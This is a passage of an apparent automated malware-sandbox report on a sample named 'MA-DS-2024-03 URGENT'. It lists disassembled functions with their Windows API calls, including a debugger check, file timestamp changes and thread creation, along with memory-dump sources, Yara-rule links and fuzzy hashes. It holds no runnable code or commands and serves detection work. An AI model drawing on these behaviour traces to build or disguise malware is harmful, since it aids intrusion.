                                                        • Opcode Fuzzy Hash: e563156e91e36691d5f4fcac2aaf6be647dac8c86d34431775506fe1d7328f76
                                                        • Instruction Fuzzy Hash: 8AF13A716083019FC714DF29C480A6ABBE5FF88318F54892EF8999B392D734E945CF86
                                                        Function 01697DF0 Relevance: 4.6, APIs: 3, Instructions: 89COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1287711947.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_1670000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: ComputerName
                                                        • String ID:
                                                        • API String ID: 3545744682-0
                                                        • Opcode ID: fd724e54bbd69018b0f5bb85d31e70a41374b4488c96890057e49639ec971c2c
                                                        • Instruction ID: de95f6c935edc8798486cdc71498178b4aea93fb6d26ed235554ece81ff126e1
                                                        • Opcode Fuzzy Hash: fd724e54bbd69018b0f5bb85d31e70a41374b4488c96890057e49639ec971c2c
                                                        • Instruction Fuzzy Hash: 8C2125336693442BEF36561C8C05BB93E3D6F92B10F88848DF68957392D364650CCEA7
                                                        Function 0040434A Relevance: 4.6, APIs: 3, Instructions: 77windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • _memset.LIBCMT ref: 00404370
                                                        • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00404415
                                                        • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00404432
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: IconNotifyShell_$_memset
                                                        • String ID:
                                                        • API String ID: 1505330794-0
                                                        • Opcode ID: 55e578eaf81f1082cb721cb8179a93cbba9ea3621e04278649df261dfa9eaab8
                                                        • Instruction ID: 448a70bf35e4549ae47872dc9eb977fea889799f7ce089bf6dae1479d4278b9a
                                                        • Opcode Fuzzy Hash: 55e578eaf81f1082cb721cb8179a93cbba9ea3621e04278649df261dfa9eaab8
                                                        • Instruction Fuzzy Hash: 4E3184B05047019FD760DF24D884A9BBBF8FB98308F00093FEA9A92391D7746944CB5A
                                                        Function 0042571C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • __FF_MSGBANNER.LIBCMT ref: 00425733
                                                          • Part of subcall function 0042A16B: __NMSG_WRITE.LIBCMT ref: 0042A192
                                                          • Part of subcall function 0042A16B: __NMSG_WRITE.LIBCMT ref: 0042A19C
                                                        • __NMSG_WRITE.LIBCMT ref: 0042573A
                                                          • Part of subcall function 0042A1C8: GetModuleFileNameW.KERNEL32(00000000,004C33BA,00000104,00000000,00000001,00000000), ref: 0042A25A
                                                          • Part of subcall function 0042A1C8: ___crtMessageBoxW.LIBCMT ref: 0042A308
                                                          • Part of subcall function 0042309F: ___crtCorExitProcess.LIBCMT ref: 004230A5
                                                          • Part of subcall function 0042309F: ExitProcess.KERNEL32 ref: 004230AE
                                                          • Part of subcall function 00428B28: __getptd_noexit.LIBCMT ref: 00428B28
                                                        • RtlAllocateHeap.NTDLL(00A60000,00000000,00000001,?,00000000,00000001,?,00420DD3,?,00000000,%I,?,00409E8C,?,?,?), ref: 0042575F
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                        • String ID:
                                                        • API String ID: 1372826849-0
                                                        • Opcode ID: 173bc1eb0939af60788e3920f729a181213a4711687b08a62f5fb4dd74449d1b
                                                        • Instruction ID: 12628286b9c33790f0bcaf27d243d0f78d5a939af01e39ac9af769d2403f214a
                                                        • Opcode Fuzzy Hash: 173bc1eb0939af60788e3920f729a181213a4711687b08a62f5fb4dd74449d1b
                                                        • Instruction Fuzzy Hash: 8101D235380B31DADA102B36BC42A2E67588BC2766FD0043FF9059A281DE7C9D01866D
                                                        Function 004698A2 Relevance: 4.5, APIs: 3, Instructions: 24filetimeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,00469548,?,?,?,?,?,00000004), ref: 004698BB
                                                        • SetFileTime.KERNEL32(00000000,?,00000000,?,?,00469548,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 004698D1
                                                        • CloseHandle.KERNEL32(00000000,?,00469548,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 004698D8
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: File$CloseCreateHandleTime
                                                        • String ID:
                                                        • API String ID: 3397143404-0
                                                        • Opcode ID: bd87c49bddbed0dd2230edd6d70eff61a4bb717c0cd42ce1b208173b53aacf55
                                                        • Instruction ID: c759ec0fed9c3a555ac5ec6521767d99e991bc38b38178bd45d0c2782cb34c4e
                                                        • Opcode Fuzzy Hash: bd87c49bddbed0dd2230edd6d70eff61a4bb717c0cd42ce1b208173b53aacf55
                                                        • Instruction Fuzzy Hash: 6EE08632140214B7D7212B54EC0DFDE7B19EB06760F144535FF14A90E087B12925979C
                                                        Function 00468D0D Relevance: 4.5, APIs: 3, Instructions: 22COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • _free.LIBCMT ref: 00468D1B
                                                          • Part of subcall function 00422D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00429A24), ref: 00422D69
                                                          • Part of subcall function 00422D55: GetLastError.KERNEL32(00000000,?,00429A24), ref: 00422D7B
                                                        • _free.LIBCMT ref: 00468D2C
                                                        • _free.LIBCMT ref: 00468D3E
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: _free$ErrorFreeHeapLast
                                                        • String ID:
                                                        • API String ID: 776569668-0
                                                        • Opcode ID: 625e2a9df38ff8793e00647abbe9ccf0d6414545c555b0c4696158d27d9f7751
                                                        • Instruction ID: 6b151060fb8ed88ed9ffdc5938a612973e117ec8253147f08314cae1c0c73c84
                                                        • Opcode Fuzzy Hash: 625e2a9df38ff8793e00647abbe9ccf0d6414545c555b0c4696158d27d9f7751
                                                        • Instruction Fuzzy Hash: 10E0C2B170171253CB20A579BA40A8313DC4F4C3967440A0FB40DD7282DEACF842803C
                                                        Function 0040A9C3 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 534COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: CALL
                                                        • API String ID: 0-4196123274
                                                        • Opcode ID: 91046c8f0fa5273952b35ec842c427b3cd4766c3a1799b0318040e1ceb18c9a5
                                                        • Instruction ID: c803bb07f2a617980fc862d1973d54e65b33ee20ceb4547c7cbfd92c67e19f3b
                                                        • Opcode Fuzzy Hash: 91046c8f0fa5273952b35ec842c427b3cd4766c3a1799b0318040e1ceb18c9a5
                                                        • Instruction Fuzzy Hash: 8A225B70608301DFD724DF14C454A6AB7E1FF44308F15896EE98AAB3A2D739EC55CB8A
                                                        Function 0046625D Relevance: 3.2, APIs: 2, Instructions: 216COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • _memmove.LIBCMT ref: 00466331
                                                        • _memmove.LIBCMT ref: 0046634F
                                                          • Part of subcall function 004664B8: _memmove.LIBCMT ref: 00466546
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: _memmove
                                                        • String ID:
                                                        • API String ID: 4104443479-0
                                                        • Opcode ID: 3fe33aab397f30d0889cb1efc8094a880b65a195758c873a9b4f014c07d3de69
                                                        • Instruction ID: 4fdbce5aebb68e018be302049be38745ffdeeadb4015f2ff05c145eb5759b112
                                                        • Opcode Fuzzy Hash: 3fe33aab397f30d0889cb1efc8094a880b65a195758c873a9b4f014c07d3de69
                                                        • Instruction Fuzzy Hash: 9871E3706002049FCB24EF15D845AAA77B5EF80368F26851FEC951B392EB3DAC41CB5E
                                                        Function 004677B3 Relevance: 3.1, APIs: 2, Instructions: 133COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: _memmove
                                                        • String ID:
                                                        • API String ID: 4104443479-0
                                                        • Opcode ID: dc0d714e589485860266ba411340546e4a9e71afc0b415dac8860b1e3e63fce8
                                                        • Instruction ID: 665aeeeda7618be144ab26ba5ea9c3b14b1a5e971dff4faecb2a1d88e99e5761
                                                        • Opcode Fuzzy Hash: dc0d714e589485860266ba411340546e4a9e71afc0b415dac8860b1e3e63fce8
                                                        • Instruction Fuzzy Hash: 8841D7716082059BCB10FFA9D8859BAB7E8EF49308B64445FE14597382EF3D9C05CB6A
                                                        Function 01675A3B Relevance: 3.1, APIs: 2, Instructions: 60threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateThread.KERNEL32(00000000,00000000,016755C0,?,00000000,00000000), ref: 01675A51
                                                        • RtlExitUserThread.NTDLL(00000000), ref: 01675B11
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1287711947.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_1670000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: Thread$CreateExitUser
                                                        • String ID:
                                                        • API String ID: 4108186749-0
                                                        • Opcode ID: 3349ced361ac91f2175416c8d1487e7a6480c7cdc9400ec4e4b41b387b337626
                                                        • Instruction ID: aa22db70304397c2448a8aaaff199be82fa62eee31c5e446e102fcb180139a60
                                                        • Opcode Fuzzy Hash: 3349ced361ac91f2175416c8d1487e7a6480c7cdc9400ec4e4b41b387b337626
                                                        • Instruction Fuzzy Hash: 8211672194C3C24EE7238B6C8C68776BFA05F53520F1D02DAC1928E2E3D399484DD7A3
                                                        Function 004047D0 Relevance: 3.1, APIs: 2, Instructions: 59COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • IsThemeActive.UXTHEME ref: 00404834
                                                          • Part of subcall function 0042336C: __lock.LIBCMT ref: 00423372
                                                          • Part of subcall function 0042336C: DecodePointer.KERNEL32(00000001,?,00404849,00457C74), ref: 0042337E
                                                          • Part of subcall function 0042336C: EncodePointer.KERNEL32(?,?,00404849,00457C74), ref: 00423389
                                                          • Part of subcall function 004048FD: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00404915
                                                          • Part of subcall function 004048FD: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 0040492A
                                                          • Part of subcall function 00403B3A: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00403B68
                                                          • Part of subcall function 00403B3A: IsDebuggerPresent.KERNEL32 ref: 00403B7A
                                                          • Part of subcall function 00403B3A: GetFullPathNameW.KERNEL32(00007FFF,?,?,004C52F8,004C52E0,?,?), ref: 00403BEB
                                                          • Part of subcall function 00403B3A: SetCurrentDirectoryW.KERNEL32(?), ref: 00403C6F
                                                        • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00404874
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                                                        • String ID:
                                                        • API String ID: 1438897964-0
                                                        • Opcode ID: 13bbe0c74f5194e49c071aa5a0b14ab81aac5f2f5d26dabd82ae82306b4d1084
                                                        • Instruction ID: 9525eea27cfe2a06ee6bb0b94f8a439f0fec78f72a1223afaaa4f4cc7b3f6ca0
                                                        • Opcode Fuzzy Hash: 13bbe0c74f5194e49c071aa5a0b14ab81aac5f2f5d26dabd82ae82306b4d1084
                                                        • Instruction Fuzzy Hash: 96118E729143019BC700EF69E80591EBBE8EB95754F10893FF440932B2DB749A49CB9E
                                                        Function 00405C99 Relevance: 3.1, APIs: 2, Instructions: 57fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000,?,00405821,?,?,?,?), ref: 00405CC7
                                                        • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,00000000,?,00405821,?,?,?,?), ref: 0043DD73
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: CreateFile
                                                        • String ID:
                                                        • API String ID: 823142352-0
                                                        • Opcode ID: aed05ab6a1b88559d57bbe8f1293197c90d85f92c05dbd21c07c0e87b90c3386
                                                        • Instruction ID: 3e9ad2372c7cfb2b297ed5c82f770502f6fc7a31e1f40b0728b8e52e39df89fe
                                                        • Opcode Fuzzy Hash: aed05ab6a1b88559d57bbe8f1293197c90d85f92c05dbd21c07c0e87b90c3386
                                                        • Instruction Fuzzy Hash: 9A018870144708BEF7201E24CC8AF673ADCEB05768F10832AFAD56A1D0C6B81C458F58
                                                        Function 00420DB6 Relevance: 3.0, APIs: 2, Instructions: 44COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 0042571C: __FF_MSGBANNER.LIBCMT ref: 00425733
                                                          • Part of subcall function 0042571C: __NMSG_WRITE.LIBCMT ref: 0042573A
                                                          • Part of subcall function 0042571C: RtlAllocateHeap.NTDLL(00A60000,00000000,00000001,?,00000000,00000001,?,00420DD3,?,00000000,%I,?,00409E8C,?,?,?), ref: 0042575F
                                                        • std::exception::exception.LIBCMT ref: 00420DEC
                                                        • __CxxThrowException@8.LIBCMT ref: 00420E01
                                                          • Part of subcall function 0042859B: RaiseException.KERNEL32(?,?,00000000,004B9E78,?,00000001,?,?,?,00420E06,00000000,004B9E78,00409E8C,00000001), ref: 004285F0
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                        • String ID:
                                                        • API String ID: 3902256705-0
                                                        • Opcode ID: 87bb70d5579a02d49aac5620635c4af45f8313e50e00e2e64927f1571595629b
                                                        • Instruction ID: 7ce0db18d3e86308d2e94e4ef4c1f65fcbea9f9514d772724804ad69f7891851
                                                        • Opcode Fuzzy Hash: 87bb70d5579a02d49aac5620635c4af45f8313e50e00e2e64927f1571595629b
                                                        • Instruction Fuzzy Hash: BAF0863560223976CB10BA95FD015DF7BE89F01315F90452FF90496282DFB89A8091DD
                                                        Function 004255FD Relevance: 3.0, APIs: 2, Instructions: 42COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: __lock_file_memset
                                                        • String ID:
                                                        • API String ID: 26237723-0
                                                        • Opcode ID: ba8f5e451a8ec4a75135d94e347059916301475a1d87ff8d947c1e1db94b3a7d
                                                        • Instruction ID: eb59cd814e1449f2521413b7bdb600bd306f3e119aeaedc73612e9d55c5f6ff2
                                                        • Opcode Fuzzy Hash: ba8f5e451a8ec4a75135d94e347059916301475a1d87ff8d947c1e1db94b3a7d
                                                        • Instruction Fuzzy Hash: B901D871A01624ABCF21AF66BC0259F7B61AF50325FD0411FB81817251DB398551DF59
                                                        Function 004253A6 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00428B28: __getptd_noexit.LIBCMT ref: 00428B28
                                                        • __lock_file.LIBCMT ref: 004253EB
                                                          • Part of subcall function 00426C11: __lock.LIBCMT ref: 00426C34
                                                        • __fclose_nolock.LIBCMT ref: 004253F6
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                        • String ID:
                                                        • API String ID: 2800547568-0
                                                        • Opcode ID: 835793fb4b5a24fbea1eeed30733b59c67049ef9a82bceb899d9520eea3a16f0
                                                        • Instruction ID: fafcd99f2ade88ab86af259f2ce8aa17897398df1327fb2dd29172a4384519b5
                                                        • Opcode Fuzzy Hash: 835793fb4b5a24fbea1eeed30733b59c67049ef9a82bceb899d9520eea3a16f0
                                                        • Instruction Fuzzy Hash: 56F09C71B026249AD710BF66780579D66E06F41378FA1914FE814E71C1CFBC49419B5E
                                                        Function 00408061 Relevance: 2.6, APIs: 2, Instructions: 54COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000001,00000000,00000000,?,?,?,0040542F,?,?,?,?,?), ref: 0040807A
                                                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000001,00000000,?,?,?,0040542F,?,?,?,?,?), ref: 004080AD
                                                          • Part of subcall function 0040774D: _memmove.LIBCMT ref: 00407789
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
